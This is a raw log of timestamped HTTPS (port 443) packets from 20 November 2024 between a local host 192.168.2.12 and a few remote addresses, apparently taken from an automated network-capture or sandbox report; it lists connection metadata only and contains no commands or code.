                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.464385986 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.464468956 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.464500904 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.464595079 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.471822023 CET49816443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.471863985 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.472301960 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.496959925 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.497065067 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.497102976 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.497133970 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.497227907 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.499814034 CET49817443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.513695002 CET44349818104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.513854027 CET44349818104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.515501976 CET49818443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.518492937 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.518680096 CET44349819104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.521147013 CET49827443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.521277905 CET44349827104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.521421909 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.521598101 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.523911953 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.524004936 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.524224997 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.524513960 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.533904076 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.534076929 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.534431934 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.534579992 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.538351059 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.538520098 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.541997910 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.542010069 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.543308973 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.543329000 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.545361996 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.548556089 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.548747063 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.552917004 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.552927971 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.553025961 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.553034067 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.554168940 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.554183960 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.554259062 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.554270029 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.560026884 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.560028076 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.577788115 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.577811956 CET49827443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.577826977 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.578288078 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.578696012 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.593065023 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.593096018 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.593106985 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.593121052 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.593137026 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.593144894 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.608050108 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.608078003 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.608081102 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.654104948 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.654141903 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.654426098 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.669238091 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.670428991 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.670655012 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.671766043 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.671928883 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.672139883 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.672281027 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.672574043 CET49818443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.672597885 CET44349818104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.672924042 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.673415899 CET49827443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.673572063 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.673685074 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.673732996 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.673851013 CET44349827104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.674007893 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.674057007 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.674115896 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.674175978 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.674267054 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.674312115 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.674357891 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.698256969 CET49815443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.698290110 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715332031 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715333939 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715334892 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715344906 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715353012 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715358019 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715359926 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715368032 CET44349819104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715374947 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715375900 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.715382099 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.726264000 CET49816443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.726299047 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.726881027 CET49817443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.726898909 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.728671074 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.728698015 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.728790998 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.728802919 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.728831053 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.728852987 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.789232016 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.789237976 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:47.789238930 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.049369097 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.049454927 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.049482107 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.049576044 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.051804066 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.051898956 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.051980972 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.053977013 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.054039955 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.054563999 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.054629087 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.054637909 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.054639101 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.054681063 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.054754972 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.056526899 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.057085991 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.057156086 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.057231903 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.057760000 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.057784081 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.058451891 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.059498072 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.059639931 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.062558889 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.063690901 CET44349819104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.063720942 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.063755989 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.063947916 CET44349819104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.064436913 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.064508915 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.064544916 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.064578056 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.064702988 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.064728022 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.067405939 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.067420006 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.069245100 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.069247961 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.069262981 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.070426941 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.070444107 CET44349819104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.072614908 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.072689056 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.072741032 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.073098898 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.073127985 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.074161053 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.074172020 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.076180935 CET49831443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.076220036 CET44349831104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.076469898 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.076492071 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.081320047 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.081435919 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.081768036 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.082878113 CET49831443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.082879066 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.082962990 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.082971096 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.083508015 CET49831443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.083525896 CET44349831104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.085072994 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.085098028 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.093451977 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.093472958 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.102722883 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.102787971 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.102812052 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.102838993 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.103068113 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.103080988 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.104485989 CET49832443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.104516029 CET44349832104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.106019020 CET49832443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.106621981 CET49832443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.106632948 CET44349832104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.109364033 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.109396935 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.110590935 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.110618114 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.111102104 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.119476080 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.121171951 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.121189117 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.121908903 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.127590895 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.134787083 CET49833443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.134824991 CET44349833104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.134933949 CET49833443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.135154009 CET49833443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.135159969 CET44349833104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.136064053 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.136123896 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.136298895 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.136313915 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.136320114 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.136327028 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.143249989 CET49834443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.143290043 CET44349834104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.143605947 CET49835443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.143629074 CET44349835104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.143675089 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.143702984 CET49834443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.144089937 CET49834443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.144102097 CET44349834104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.144691944 CET49835443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.144963980 CET49835443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.144973993 CET44349835104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.156388998 CET44349827104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.156538010 CET44349827104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.156914949 CET49827443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.157845974 CET49827443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.157860041 CET44349827104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.161649942 CET49836443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.161709070 CET44349836104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.167139053 CET49837443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.167179108 CET44349837104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.167793036 CET49836443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.167990923 CET49837443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.168245077 CET49837443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.168262959 CET44349837104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.168389082 CET49836443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.168407917 CET44349836104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.184274912 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.184286118 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.196933031 CET49838443192.168.2.1235.190.80.1
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.196979046 CET4434983835.190.80.1192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.197128057 CET49838443192.168.2.1235.190.80.1
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.197360039 CET49838443192.168.2.1235.190.80.1
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.197372913 CET4434983835.190.80.1192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.222598076 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.224387884 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.253232956 CET49840443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.253266096 CET44349840104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.253417969 CET49840443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.253628969 CET49840443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.253638983 CET44349840104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.265836000 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.269352913 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.269382954 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.269407034 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.269435883 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.269450903 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.269520044 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.269572973 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.271986961 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.272003889 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.286319017 CET49841443192.168.2.12104.16.103.112
